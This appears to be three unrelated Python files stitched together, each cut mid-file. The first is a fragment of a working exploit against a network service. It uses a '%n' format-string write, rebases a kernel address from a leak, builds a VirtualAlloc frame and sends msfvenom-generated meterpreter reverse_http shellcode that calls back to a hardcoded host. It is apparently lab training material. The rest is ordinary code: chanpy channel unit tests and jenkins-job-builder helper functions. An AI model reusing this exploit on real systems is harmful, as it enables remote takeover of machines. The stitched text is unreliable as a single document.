    buf += b"%x:" * 13
    buf += b"%" + b"%d" % width + b"x:"
    buf += b"%n"
    buf += b"%x" * 0x6b
    buf += b"B" * 0x100
    buf += b"C" * 0x100
    # Padding
    buf += bytearray([0x41] * (0x404 - len(buf)))
    s.send(buf)
def write_dword_value(s: socket, dword_value: int, write_address: int):
    """Write a 32-bit value one byte at a time (little-endian) using the '%n' byte-write primitive."""
    for offset in range(4):
        low_byte = (dword_value >> (offset * 8)) & 0xFF
        write_byte_value(s, low_byte, write_address + offset)
def send_invalid_opcode(s: socket):
    """Send a request with unsupported opcode 0x80; no response is read."""
    # Found buffer at 0xd283b30 with leaked stack address of 0xd22ded4
    # buffer is at leaked stack address + 0x55c5c
    # psAgentCommand header: big-endian total size, filler, opcode,
    # three (offset, size) memcpy pairs, trailing filler.
    buf = pack(">i", 0x400)
    buf += b"\x41" * 0xC
    buf += pack("<i", 0x80)             # opcode
    for region_offset, region_size in ((0x0, 0x100), (0x100, 0x100), (0x200, 0x100)):
        buf += pack("<i", region_offset)    # memcpy: offset
        buf += pack("<i", region_size)      # memcpy: size field
    buf += b"\x41" * 0x8
    # psCommandBuffer: recognizable filler for locating the buffer in a debugger.
    buf += b"DDDDEEEEFFFFGGGGHHHH"
    buf += pack("<i", 0x200)
    buf += b"C" * 0x200
    # Pad the request to the fixed 0x404-byte command size.
    buf += b"\x41" * (0x404 - len(buf))
    s.send(buf)
    # receive_data(s)
def send_payload(s: socket, shellcode: bytearray, buffer_address: int, kb_base: int):
    """Send the final request: a fake stack frame that calls VirtualAlloc and
    returns into a NOP sled followed by *shellcode* at *buffer_address*.
    """
    # NOP sled (0x20) starts after the six planted dwords below (0x18 bytes);
    # NOTE(review): 0x18 covers the last six dwords, not the full frame -- the
    # exact landing offset depends on how the service consumes the buffer.
    shellcode_offset = 0x18
    # psAgentCommand
    buf = pack(">i", 0x400)
    buf += bytearray([0x41] * 0xC)
    buf += pack("<i", 0x80)  # opcode
    buf += pack("<i", 0x0)  # 1st memcpy: offset
    buf += pack("<i", 0x300)  # 1st memcpy: size field
    buf += pack("<i", 0x100)  # 2nd memcpy: offset
    buf += pack("<i", 0x100)  # 2nd memcpy: size field
    buf += pack("<i", 0x200)  # 3rd memcpy: offset
    buf += pack("<i", 0x100)  # 3rd memcpy: size field
    buf += bytearray([0x41] * 0x8)
    # psCommandBuffer
    # Stack Setup:
    # VirtualAlloc address
    # Return address AKA Shellcode address
    # Shellcode address
    # 0x200
    # 0x1000
    # 0x40
    # 0x101125D0 is rebased from kernelbase's preferred base onto the leaked base.
    buf += pack("<i", convert_kernel_base_address(kb_base, 0x101125D0))
    buf += pack("<i", buffer_address + shellcode_offset)
    buf += pack("<i", buffer_address + shellcode_offset)
    buf += pack("<i", 0x200)   # VirtualAlloc lpAddress-relative size argument
    buf += pack("<i", 0x1000)  # MEM_COMMIT
    buf += pack("<i", 0x40)    # PAGE_EXECUTE_READWRITE
    buf += b'\x90' * 0x20
    buf += shellcode
    # Padding
    buf += bytearray([0x41] * (0x404 - len(buf)))
    s.send(buf)
    # receive_data(s)
def convert_kernel_base_address(kb_base_address: int, address: int):
    """Rebase *address* from kernelbase's preferred image base (0x10000000) onto the leaked base."""
    preferred_base = 0x10000000
    rva = address - preferred_base
    return kb_base_address + rva
def get_shellcode(lhost: str, lport: int):
    """Generate a raw windows/meterpreter/reverse_http payload with msfvenom and return its bytes."""
    cmd = [
        '/usr/bin/msfvenom',
        '-p', 'windows/meterpreter/reverse_http',
        'LHOST={}'.format(lhost),
        'LPORT={}'.format(str(lport)),
        'EXITFUNC=thread',
        '-f', 'raw',
    ]
    # shell=False with an argument list: nothing here is shell-interpreted.
    completed = subprocess.run(cmd, shell=False, check=False, capture_output=True)
    print("Payload: {}".format(cmd[2]))
    print("Local Host: {}".format(lhost))
    print("Local Port: {}".format(str(lport)))
    # msfvenom writes its status chatter to stderr; the payload itself is stdout.
    print(completed.stderr.decode('UTF-8'))
    return completed.stdout
def main():
global start_value
server = "192.168.185.10"
lhost = "192.168.49.185"
lport = 8443
if len(sys.argv) >= 2:
server = sys.argv[1]
port = 11460
print("Generating shellcode...")
shellcode = get_shellcode(lhost, lport)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((server, port))
print("Dumping values in the stack to the log...")
dump_stack_values_to_log(s)
print("Retreiving | |
#!/usr/bin/env python3
# Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import threading
import time
import unittest
import chanpy as c
from chanpy import _buffers, chan, transducers as xf
from chanpy._channel import Promise, create_flag, FlagHandler
def b_list(ch):
    """Blockingly drain channel *ch* and return its values as a list."""
    return [*ch.to_iter()]
async def a_list(ch):
    """Asynchronously collect every value taken from channel *ch* into a list."""
    return await c.to_list(ch).get()
class TestAsync(unittest.TestCase):
    """Transfers, alts, and cancellation across asyncio coroutines and threads."""

    def test_thread_put_to_async_get_without_wait(self):
        def putter(ch):
            ch.b_put('success')

        async def main():
            ch = chan()
            threading.Thread(target=putter, args=[ch]).start()
            return await ch.get()

        self.assertEqual(asyncio.run(main()), 'success')

    def test_thread_get_to_async_put_after_wait(self):
        result = None

        def getter(ch):
            nonlocal result
            result = ch.b_get()

        async def main():
            ch = chan()
            getter_thread = threading.Thread(target=getter, args=[ch])
            getter_thread.start()
            self.assertIs(await ch.put('success'), True)
            getter_thread.join()
            self.assertEqual(result, 'success')

        asyncio.run(main())

    def test_async_only_transfer(self):
        async def getter(ch):
            return await ch.get()

        async def main():
            ch = chan()
            get_ch = c.go(getter(ch))
            self.assertIs(await ch.put('success'), True)
            self.assertEqual(await get_ch.get(), 'success')

        asyncio.run(main())

    def test_go_from_different_thread(self):
        def getter_thread(ch):
            async def getter():
                return await ch.get()
            return c.go(getter()).b_get()

        async def main():
            ch = chan()
            thread_result_ch = c.thread(lambda: getter_thread(ch))
            self.assertIs(await ch.put('success'), True)
            self.assertEqual(await thread_result_ch.get(), 'success')

        asyncio.run(main())

    def test_go_coroutine_never_awaited(self):
        """ Test that no 'coroutine was not awaited' warning is raised
        The warning could be raised if the coroutine was added to the loop
        indirectly.
        Example:
        # If 'go' used a wrapper coroutine around 'coro' then 'coro' may
        # never be added to the loop. This is because there is no guarantee
        # that the wrapper coroutine will ever run and thus call await on
        # 'coro'.
        #
        # The following 'go' implementation would fail if wrapper never
        # ends up running:
        def go(coro):
            ch = chan(1)
            async def wrapper():
                ret = await coro  # I may never run
                if ret is not None:
                    await ch.put(ret)
                ch.close()
            asyncio.run_coroutine_threadsafe(wrapper(), get_loop())
        """
        def thread():
            async def coro():
                pass
            c.go(coro())

        async def main():
            c.thread(thread).b_get()

        # Assert does NOT warn
        with self.assertRaises(AssertionError):
            with self.assertWarns(RuntimeWarning):
                asyncio.run(main())

    def test_alt_get_no_wait(self):
        get_ch, put_ch = chan(), chan()

        async def putter():
            await get_ch.put('success')

        async def main():
            c.go(putter())
            await asyncio.sleep(0.1)
            return await c.alt([put_ch, 'noSend'], get_ch, priority=True)

        self.assertEqual(asyncio.run(main()), ('success', get_ch))

    def test_alt_put_after_wait(self):
        get_ch, put_ch = chan(), chan()

        async def putter():
            await asyncio.sleep(0.1)
            await put_ch.get()

        async def main():
            c.go(putter())
            return await c.alt([put_ch, 'success'], get_ch, priority=True)

        self.assertEqual(asyncio.run(main()), (True, put_ch))

    def test_alt_timeout(self):
        async def main():
            start_time = time.time()
            timeout_ch = c.timeout(100)
            self.assertEqual(await c.alt(chan(), timeout_ch),
                             (None, timeout_ch))
            elapsed_secs = time.time() - start_time
            # Allow generous scheduling slop around the 100 ms timeout.
            self.assertIs(0.05 < elapsed_secs < 0.15, True)

        asyncio.run(main())

    def test_alt_default_when_available(self):
        async def main():
            ch = chan(1)
            await ch.put('success')
            self.assertEqual(await c.alt(ch, default='ignore me'),
                             ('success', ch))

        asyncio.run(main())

    def test_alt_default_when_unavailable(self):
        async def main():
            ch = chan()
            # When nothing is ready the default value is paired with 'default'.
            self.assertEqual(await c.alt(ch, default='success'),
                             ('success', 'default'))

        asyncio.run(main())

    def test_successful_cancel_get(self):
        async def main():
            ch = chan()
            get_future = ch.get()
            self.assertIs(get_future.cancelled(), False)
            self.assertIs(get_future.cancel(), True)
            self.assertIs(get_future.cancelled(), True)
            self.assertIs(ch.offer('reject me'), False)

        asyncio.run(main())

    def test_successful_cancel_put(self):
        async def main():
            ch = chan()
            put_future = ch.put('cancel me')
            self.assertIs(put_future.cancelled(), False)
            self.assertIs(put_future.cancel(), True)
            self.assertIs(put_future.cancelled(), True)
            self.assertIsNone(ch.poll())

        asyncio.run(main())

    def test_successful_cancel_alt(self):
        async def main():
            ch = chan()
            alt_future = c.alt(ch, priority=True)
            self.assertIs(alt_future.cancelled(), False)
            self.assertIs(alt_future.cancel(), True)
            self.assertIs(alt_future.cancelled(), True)
            self.assertIs(ch.offer('reject me'), False)

        asyncio.run(main())

    def test_unsuccessful_cancel_get(self):
        async def main():
            ch = chan()
            get_future = ch.get()
            self.assertIs(await ch.put('success'), True)
            # cancel() will end up calling set_result() since
            # set_result_threadsafe() callback won't have been called yet
            self.assertIs(get_future.cancel(), False)
            self.assertEqual(get_future.result(), 'success')

        asyncio.run(main())

    def test_unsuccessful_cancel_put(self):
        async def main():
            ch = chan()
            put_future = ch.put('val')
            self.assertEqual(await ch.get(), 'val')
            # cancel() will end up calling set_result() since
            # set_result_threadsafe() callback won't have been called yet
            self.assertIs(put_future.cancel(), False)
            self.assertIs(put_future.result(), True)

        asyncio.run(main())

    def test_unsuccessful_cancel_alt(self):
        async def main():
            success_ch, fail_ch = chan(), chan()
            alt_future = c.alt(fail_ch, success_ch)
            self.assertIs(await success_ch.put('success'), True)
            # cancel() will end up calling set_result() since
            # set_result_threadsafe() callback won't have been called yet
            self.assertIs(alt_future.cancel(), False)
            self.assertEqual(alt_future.result(), ('success', success_ch))

        asyncio.run(main())
class AbstractTestBufferedBlocking:
    """Mixin of blocking put/get tests for buffered channels.

    Concrete subclasses must provide a ``chan(n)`` factory returning a channel
    backed by an ``n``-sized buffer.
    """

    def test_unsuccessful_blocking_put_none(self):
        with self.assertRaises(TypeError):
            self.chan(1).b_put(None)

    def test_successful_blocking_get(self):
        ch = self.chan(1)
        threading.Thread(target=ch.b_put, args=['success']).start()
        self.assertEqual(ch.b_get(), 'success')

    def test_successful_blocking_put(self):
        self.assertIs(self.chan(1).b_put('success'), True)

    def test_blocking_get_closed_empty_buffer(self):
        ch = self.chan(1)
        ch.close()
        self.assertIsNone(ch.b_get())

    def test_blocking_get_closed_full_buffer(self):
        # A closed channel still drains buffered values.
        ch = self.chan(1)
        ch.b_put('success')
        ch.close()
        self.assertEqual(ch.b_get(), 'success')

    def test_blocking_put_closed_empty_buffer(self):
        ch = self.chan(1)
        ch.close()
        self.assertIs(ch.b_put('failure'), False)

    def test_blocking_put_closed_full_buffer(self):
        ch = self.chan(1)
        ch.b_put('fill buffer')
        ch.close()
        self.assertIs(ch.b_put('failure'), False)

    def test_close_while_blocking_get(self):
        ch = self.chan(1)

        def thread():
            time.sleep(0.1)
            ch.close()

        threading.Thread(target=thread).start()
        self.assertIsNone(ch.b_get())

    def test_close_while_blocking_put(self):
        # A put parked behind a full buffer still completes when the buffer
        # is drained after close.
        ch = self.chan(1)
        ch.b_put('fill buffer')

        def thread():
            time.sleep(0.1)
            ch.close()
            ch.b_get()

        threading.Thread(target=thread).start()
        self.assertIs(ch.b_put('success'), True)
        self.assertEqual(ch.b_get(), 'success')
        self.assertIsNone(ch.b_get())

    def test_iter(self):
        ch = self.chan(2)
        ch.b_put('one')
        ch.b_put('two')
        ch.close()
        self.assertEqual(b_list(ch), ['one', 'two'])
class TestBufferedBlockingChan(unittest.TestCase,
                               AbstractTestBufferedBlocking):
    """Run the blocking mixin against a fixed-buffer channel."""

    @staticmethod
    def chan(n):
        return c.chan(c.buffer(n))
class AbstractTestXform:
    """Mixin of transducer (xform) tests.

    Concrete subclasses must provide a ``chan(n, xform, ex_handler=None)``
    factory returning a buffered channel with the given transducer.
    """

    def test_xform_map(self):
        async def main():
            ch = self.chan(1, xf.map(lambda x: x + 1))
            c.onto_chan(ch, [0, 1, 2])
            self.assertEqual(await a_list(ch), [1, 2, 3])

        asyncio.run(main())

    def test_xform_filter(self):
        async def main():
            ch = self.chan(1, xf.filter(lambda x: x % 2 == 0))
            c.onto_chan(ch, [0, 1, 2])
            self.assertEqual(await a_list(ch), [0, 2])

        asyncio.run(main())

    def test_xform_early_termination(self):
        async def main():
            ch = self.chan(1, xf.take(2))
            c.onto_chan(ch, [1, 2, 3, 4])
            self.assertEqual(await a_list(ch), [1, 2])

        asyncio.run(main())

    def test_xform_early_termination_works_after_close(self):
        async def main():
            ch = self.chan(1, xf.take_while(lambda x: x != 2))
            for i in range(4):
                ch.f_put(i)
            ch.close()
            self.assertEqual(await a_list(ch), [0, 1])
            # Pending puts must have been released once the xform terminated.
            self.assertEqual(len(ch._puts), 0)

        asyncio.run(main())

    def test_xform_successful_overfilled_buffer(self):
        # cat expands one put into several buffered values.
        ch = self.chan(1, xf.cat)
        ch.b_put([1, 2, 3])
        ch.close()
        self.assertEqual(b_list(ch), [1, 2, 3])

    def test_xform_unsuccessful_offer_overfilled_buffer(self):
        ch = self.chan(1, xf.cat)
        ch.b_put([1, 2])
        self.assertIs(ch.offer([1]), False)

    def test_unsuccessful_transformation_to_none(self):
        # Transducers must never produce None on a channel.
        ch = self.chan(1, xf.map(lambda _: None))
        with self.assertRaises(AssertionError):
            ch.b_put('failure')

    def test_close_flushes_xform_buffer(self):
        ch = self.chan(3, xf.partition_all(2))
        for i in range(3):
            ch.b_put(i)
        ch.close()
        self.assertEqual(b_list(ch), [(0, 1), (2,)])

    def test_close_does_not_flush_xform_with_pending_puts(self):
        ch = self.chan(1, xf.partition_all(2))
        for i in range(3):
            ch.f_put(i)
        ch.close()
        self.assertEqual(b_list(ch), [(0, 1), (2,)])

    def test_xform_ex_handler_non_none_return(self):
        # The handler's non-None return value replaces the failed item.
        def handler(e):
            if isinstance(e, ZeroDivisionError):
                return 'zero'

        ch = self.chan(3, xf.map(lambda x: 12 // x), handler)
        ch.b_put(-1)
        ch.b_put(0)
        ch.b_put(2)
        ch.close()
        self.assertEqual(b_list(ch), [-12, 'zero', 6])

    def test_xform_ex_handler_none_return(self):
        # A None-returning handler silently drops the failed item.
        ch = self.chan(3, xf.map(lambda x: 12 // x), lambda _: None)
        ch.b_put(-1)
        ch.b_put(0)
        ch.b_put(2)
        ch.close()
        self.assertEqual(b_list(ch), [-12, 6])
class TestXformBufferedChan(unittest.TestCase, AbstractTestXform):
    """Run the transducer mixin against a fixed-buffer channel."""

    @staticmethod
    def chan(n, xform, ex_handler=None):
        return c.chan(c.buffer(n), xform, ex_handler)
class AbstractTestBufferedNonblocking:
    """Mixin of non-blocking offer/poll tests for buffered channels.

    Concrete subclasses must provide a ``chan(n)`` factory returning a channel
    backed by an ``n``-sized buffer.
    """

    def test_unsuccessful_offer_none(self):
        with self.assertRaises(TypeError):
            self.chan(1).offer(None)

    def test_successful_poll(self):
        ch = self.chan(1)
        threading.Thread(target=ch.b_put, args=['success']).start()
        time.sleep(0.1)
        self.assertEqual(ch.poll(), 'success')

    def test_successful_offer(self):
        ch = self.chan(1)

        def thread():
            time.sleep(0.1)
            ch.offer('success')

        threading.Thread(target=thread).start()
        self.assertEqual(ch.b_get(), 'success')

    def test_unsuccessful_poll(self):
        self.assertIsNone(self.chan(1).poll())

    # NOTE(review): name presumably meant 'test_unsuccessful_offer_full_buffer'.
    def test_unsuccessful(self):
        ch = self.chan(1)
        ch.b_put('fill buffer')
        self.assertIs(ch.offer('failure'), False)

    def test_poll_closed_empty_buffer(self):
        ch = self.chan(1)
        ch.close()
        self.assertIsNone(ch.poll())

    def test_poll_closed_full_buffer(self):
        ch = self.chan(1)
        ch.b_put('success')
        ch.close()
        self.assertEqual(ch.poll(), 'success')

    def test_offer_closed_empty_buffer(self):
        ch = self.chan(1)
        ch.close()
        self.assertIs(ch.offer('failure'), False)

    # NOTE(review): name presumably meant 'test_offer_closed_full_buffer'.
    def test_closed_full_buffer(self):
        ch = self.chan(1)
        ch.b_put('fill buffer')
        ch.close()
        self.assertIs(ch.offer('failure'), False)
class TestBufferedNonBlockingChan(unittest.TestCase,
                                  AbstractTestBufferedNonblocking):
    """Run the non-blocking mixin against a fixed-buffer channel."""

    @staticmethod
    def chan(n):
        # NOTE(review): uses the bare 'chan' import while the blocking sibling
        # uses 'c.chan' -- same callable, just inconsistent spelling.
        return chan(c.buffer(n))
class TestChan(unittest.TestCase):
    """Constructor validation for chan()."""

    def test_ValueError_nonpositive_buffer(self):
        with self.assertRaises(ValueError):
            chan(0)
class AbstractTestUnbufferedBlocking:
    """Mixin of blocking rendezvous tests for unbuffered channels.

    Concrete subclasses must provide a no-argument ``chan()`` factory.
    """

    def test_unsuccessful_blocking_put_none(self):
        with self.assertRaises(TypeError):
            self.chan().b_put(None)

    def test_blocking_get_first(self):
        ch = self.chan()

        def thread():
            time.sleep(0.1)
            ch.b_put('success')

        threading.Thread(target=thread).start()
        self.assertEqual(ch.b_get(), 'success')

    def test_blocking_put_first(self):
        ch = self.chan()

        def thread():
            time.sleep(0.1)
            ch.b_get()

        threading.Thread(target=thread).start()
        self.assertIs(ch.b_put('success'), True)

    def test_put_blocks_until_get(self):
        # The put must not return before a consumer takes the value.
        status = 'failure'
        ch = self.chan()

        def thread():
            nonlocal status
            time.sleep(0.1)
            status = 'success'
            ch.b_get()

        threading.Thread(target=thread).start()
        ch.b_put(1)
        self.assertEqual(status, 'success')

    def test_blocking_get_after_close(self):
        ch = self.chan()
        ch.close()
        self.assertIsNone(ch.b_get())

    def test_blocking_put_after_close(self):
        ch = self.chan()
        ch.close()
        self.assertIs(ch.b_put('failure'), False)

    def test_close_while_blocking_get(self):
        ch = self.chan()

        def thread():
            time.sleep(0.1)
            ch.close()

        threading.Thread(target=thread).start()
        self.assertIsNone(ch.b_get())

    def test_close_while_blocking_put(self):
        # A parked put still completes when a get arrives after close.
        ch = self.chan()

        def thread():
            time.sleep(0.1)
            ch.close()
            ch.b_get()

        threading.Thread(target=thread).start()
        self.assertIs(ch.b_put('success'), True)
        self.assertIsNone(ch.b_get())

    def test_iter(self):
        ch = self.chan()
        ch.f_put('one')
        ch.f_put('two')
        ch.close()
        self.assertEqual(b_list(ch), ['one', 'two'])

    def test_xform_exception(self):
        # A transducer requires a buffer; unbuffered + xform must raise.
        with self.assertRaises(TypeError):
            self.chan(None, xf.cat)

    def test_ex_handler_exception(self):
        # An ex_handler without a transducer must raise.
        with self.assertRaises(TypeError):
            self.chan(ex_handler=xf.identity)
class TestUnbufferedBlockingChan(unittest.TestCase,
                                 AbstractTestUnbufferedBlocking):
    """Runs the shared blocking tests against a plain unbuffered chan()."""

    @staticmethod
    def chan():
        return chan()
class AbstractTestUnbufferedNonblocking:
    """Mixin exercising poll()/offer() on an unbuffered channel.

    Concrete subclasses provide a no-argument ``chan()`` factory.
    """

    def test_unsuccessful_offer_none(self):
        # None is not a legal channel value and must raise immediately.
        with self.assertRaises(TypeError):
            self.chan().offer(None)

    def test_successful_poll(self):
        # poll() succeeds once a blocked putter is parked on the channel.
        ch = self.chan()
        threading.Thread(target=ch.b_put, args=['success']).start()
        time.sleep(0.1)
        self.assertEqual(ch.poll(), 'success')

    def test_successful_offer(self):
        # offer() succeeds when a getter is already blocked waiting.
        ch = self.chan()

        def thread():
            time.sleep(0.1)
            ch.offer('success')

        threading.Thread(target=thread).start()
        self.assertEqual(ch.b_get(), 'success')

    def test_unsuccessful_poll(self):
        # poll() on an empty channel returns None without blocking.
        self.assertIsNone(self.chan().poll())

    def test_unsuccessful_offer(self):
        # offer() with no waiting getter returns False without blocking.
        self.assertIs(self.chan().offer('failure'), False)

    def test_poll_after_close(self):
        ch = self.chan()
        ch.close()
        self.assertIsNone(ch.poll())

    def test_offer_after_close(self):
        ch = self.chan()
        ch.close()
        self.assertIs(ch.offer('failure'), False)
class TestUnbufferedNonblockingChan(unittest.TestCase,
                                    AbstractTestUnbufferedNonblocking):
    """Runs the non-blocking mixin against a plain unbuffered chan()."""

    @staticmethod
    def chan():
        return chan()
class TestPromiseChan(unittest.TestCase):
def test_multiple_gets(self):
    # A promise chan delivers its single value to every taker, repeatedly.
    ch = c.promise_chan()
    self.assertIs(ch.b_put('success'), True)
    self.assertEqual(ch.b_get(), 'success')
    self.assertEqual(ch.b_get(), 'success')
def test_multiple_puts(self):
    # Subsequent puts still report True even though the first value is the
    # one the promise keeps (hence the 'drop me' payload).
    ch = c.promise_chan()
    self.assertIs(ch.b_put('success'), True)
    self.assertIs(ch.b_put('drop me'), True)
def test_after_close(self):
    # After close(): new puts fail, but the delivered value remains
    # readable any number of times.
    ch = c.promise_chan()
    ch.b_put('success')
    ch.close()
    self.assertIs(ch.b_put('failure'), False)
    self.assertIs(ch.b_put('failure'), False)
    self.assertEqual(ch.b_get(), 'success')
    self.assertEqual(ch.b_get(), 'success')
def test_xform_filter(self):
    # The filter transducer drops -1; the first accepted value (1) becomes
    # the promise's value, so later gets keep returning 1 even after 2 was
    # put successfully.
    ch = c.promise_chan(xf.filter(lambda x: x > 0))
    self.assertIs(ch.b_put(-1), True)
    self.assertIs(ch.b_put(1), True)
    self.assertIs(ch.b_put(2), True)
    self.assertEqual(ch.b_get(), 1)
    self.assertEqual(ch.b_get(), 1)
def test_xform_complete_flush(self):
ch = c.promise_chan(xf.partition_all(3))
self.assertIs(ch.b_put(1), True)
self.assertIs(ch.b_put(2), True)
self.assertIsNone(ch.poll())
ch.close()
self.assertEqual(ch.b_get(), (1, | |
<filename>jenkins_jobs/modules/helpers.py
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import xml.etree.ElementTree as XML
from jenkins_jobs.errors import InvalidAttributeError
from jenkins_jobs.errors import JenkinsJobsException
from jenkins_jobs.errors import MissingAttributeError
def build_trends_publisher(plugin_name, xml_element, data):
    """Helper to create various trend publishers.

    Emits the analysis-core settings shared by trend publishers
    (healthy/unhealthy limits, status thresholds, pattern, ...) as
    children of *xml_element*, reading values from *data*.

    :raises JenkinsJobsException: if 'health-threshold' is not one of
        low/normal/high.
    """

    def _append_thresholds(element, threshold_data, only_totals):
        # Child tags look like 'unstableTotalAll' / 'failedNewHigh'; the
        # 'new*' group is emitted only when dont-compute-new is exactly False.
        limits = [
            ('total-all', 'TotalAll'),
            ('total-high', 'TotalHigh'),
            ('total-normal', 'TotalNormal'),
            ('total-low', 'TotalLow')]
        if only_totals is False:
            limits.extend([
                ('new-all', 'NewAll'),
                ('new-high', 'NewHigh'),
                ('new-normal', 'NewNormal'),
                ('new-low', 'NewLow')])
        for status in ('unstable', 'failed'):
            status_data = threshold_data.get(status, {})
            for key, tag_suffix in limits:
                value = status_data.get(key, '')
                XML.SubElement(element, status + tag_suffix).text = str(value)

    # Tuples of (yaml setting name, xml tag name, default value).
    settings = [
        ('healthy', 'healthy', ''),
        ('unhealthy', 'unHealthy', ''),
        ('health-threshold', 'thresholdLimit', 'low'),
        ('plugin-name', 'pluginName', plugin_name),
        ('default-encoding', 'defaultEncoding', ''),
        ('can-run-on-failed', 'canRunOnFailed', False),
        ('use-stable-build-as-reference', 'useStableBuildAsReference', False),
        ('use-previous-build-as-reference',
         'usePreviousBuildAsReference', False),
        ('use-delta-values', 'useDeltaValues', False),
        ('thresholds', 'thresholds', {}),
        ('should-detect-modules', 'shouldDetectModules', False),
        ('dont-compute-new', 'dontComputeNew', True),
        ('do-not-resolve-relative-paths', 'doNotResolveRelativePaths', False),
        ('pattern', 'pattern', '')]
    valid_health_thresholds = ['low', 'normal', 'high']

    for key, tag_name, default in settings:
        node = XML.SubElement(xml_element, tag_name)
        value = data.get(key, default)
        if key == 'thresholds':
            _append_thresholds(node, value,
                               data.get('dont-compute-new', True))
        elif key == 'health-threshold' and value not in valid_health_thresholds:
            raise JenkinsJobsException("health-threshold must be one of %s" %
                                       ", ".join(valid_health_thresholds))
        else:
            # Booleans are serialized lowercase ('true'/'false') for Jenkins.
            if isinstance(default, bool):
                node.text = str(value).lower()
            else:
                node.text = str(value)
def config_file_provider_builder(xml_parent, data):
    """Builder / Wrapper helper: emit the managed-files list used by the
    Config File Provider plugin (one ManagedFile element per entry)."""
    managed = XML.SubElement(xml_parent, 'managedFiles')
    for entry in data.get('files', []):
        node = XML.SubElement(
            managed,
            'org.jenkinsci.plugins.configfiles.buildwrapper.ManagedFile')
        mapping = [
            ('file-id', 'fileId', None),
            ('target', 'targetLocation', ''),
            ('variable', 'variable', ''),
            ('replace-tokens', 'replaceTokens', False),
        ]
        convert_mapping_to_xml(node, entry, mapping, fail_required=True)
def config_file_provider_settings(xml_parent, data):
    """Emit the Maven ``settings``/``globalSettings`` provider elements.

    ``settings`` / ``global-settings`` in *data* may name a plain settings
    file or a Config File Provider id; the type comes from
    ``settings-type`` / ``global-settings-type`` (default 'file') and is
    auto-detected as 'cfp' for old-style ids embedding the provider class
    name.

    :raises InvalidAttributeError: if a settings type is not one of
        SETTINGS_TYPES.
    """
    SETTINGS_TYPES = ['file', 'cfp']
    settings = {
        'default-settings':
        'jenkins.mvn.DefaultSettingsProvider',
        'settings':
        'jenkins.mvn.FilePathSettingsProvider',
        'config-file-provider-settings':
        'org.jenkinsci.plugins.configfiles.maven.job.MvnSettingsProvider',
        'default-global-settings':
        'jenkins.mvn.DefaultGlobalSettingsProvider',
        'global-settings':
        'jenkins.mvn.FilePathGlobalSettingsProvider',
        'config-file-provider-global-settings':
        'org.jenkinsci.plugins.configfiles.maven.job.'
        'MvnGlobalSettingsProvider',
    }

    if 'settings' in data:
        # Support for Config File Provider
        settings_file = str(data['settings'])
        settings_type = data.get('settings-type', 'file')

        # For cfp versions <2.10.0 we are able to detect cfp via the config
        # settings name.
        text = 'org.jenkinsci.plugins.configfiles.maven.MavenSettingsConfig'
        if settings_file.startswith(text):
            settings_type = 'cfp'

        if settings_type == 'file':
            lsettings = XML.SubElement(
                xml_parent, 'settings',
                {'class': settings['settings']})
            XML.SubElement(lsettings, 'path').text = settings_file
        elif settings_type == 'cfp':
            lsettings = XML.SubElement(
                xml_parent, 'settings',
                {'class': settings['config-file-provider-settings']})
            XML.SubElement(lsettings, 'settingsConfigId').text = settings_file
        else:
            raise InvalidAttributeError(
                'settings-type', settings_type, SETTINGS_TYPES)
    else:
        XML.SubElement(xml_parent, 'settings',
                       {'class': settings['default-settings']})

    if 'global-settings' in data:
        # Support for Config File Provider
        global_settings_file = str(data['global-settings'])
        global_settings_type = data.get('global-settings-type', 'file')

        # For cfp versions <2.10.0 we are able to detect cfp via the config
        # settings name.
        text = ('org.jenkinsci.plugins.configfiles.maven.'
                'GlobalMavenSettingsConfig')
        if global_settings_file.startswith(text):
            global_settings_type = 'cfp'

        if global_settings_type == 'file':
            gsettings = XML.SubElement(xml_parent, 'globalSettings',
                                       {'class': settings['global-settings']})
            XML.SubElement(gsettings, 'path').text = global_settings_file
        elif global_settings_type == 'cfp':
            gsettings = XML.SubElement(
                xml_parent, 'globalSettings',
                {'class': settings['config-file-provider-global-settings']})
            XML.SubElement(
                gsettings,
                'settingsConfigId').text = global_settings_file
        else:
            # Bug fix: report the attribute actually being validated here
            # ('global-settings-type'), not 'settings-type'.
            raise InvalidAttributeError(
                'global-settings-type', global_settings_type, SETTINGS_TYPES)
    else:
        XML.SubElement(xml_parent, 'globalSettings',
                       {'class': settings['default-global-settings']})
def copyartifact_build_selector(xml_parent, data, select_tag='selector'):
    """Emit a Copy Artifact build-selector element.

    ``which-build`` picks the selector class; ``permalink`` refines the
    permalink selector.

    :raises InvalidAttributeError: for an unknown which-build or permalink.
    """
    selectdict = {
        'last-successful': 'StatusBuildSelector',
        'last-completed': 'LastCompletedBuildSelector',
        'specific-build': 'SpecificBuildSelector',
        'last-saved': 'SavedBuildSelector',
        'upstream-build': 'TriggeredBuildSelector',
        'permalink': 'PermalinkBuildSelector',
        'workspace-latest': 'WorkspaceSelector',
        'build-param': 'ParameterizedBuildSelector',
        'downstream-build': 'DownstreamBuildSelector',
        'multijob-build': 'MultiJobBuildSelector'
    }
    select = data.get('which-build', 'last-successful')
    if select not in selectdict:
        raise InvalidAttributeError('which-build',
                                    select,
                                    selectdict.keys())

    permalinkdict = {'last': 'lastBuild',
                     'last-stable': 'lastStableBuild',
                     'last-successful': 'lastSuccessfulBuild',
                     'last-failed': 'lastFailedBuild',
                     'last-unstable': 'lastUnstableBuild',
                     'last-unsuccessful': 'lastUnsuccessfulBuild'}
    permalink = data.get('permalink', 'last')
    if permalink not in permalinkdict:
        raise InvalidAttributeError('permalink',
                                    permalink,
                                    permalinkdict.keys())

    # The multijob selector lives in a different plugin package.
    if select == 'multijob-build':
        plugin_prefix = 'com.tikal.jenkins.plugins.multijob.'
    else:
        plugin_prefix = 'hudson.plugins.copyartifact.'
    selector = XML.SubElement(xml_parent, select_tag,
                              {'class': plugin_prefix + selectdict[select]})
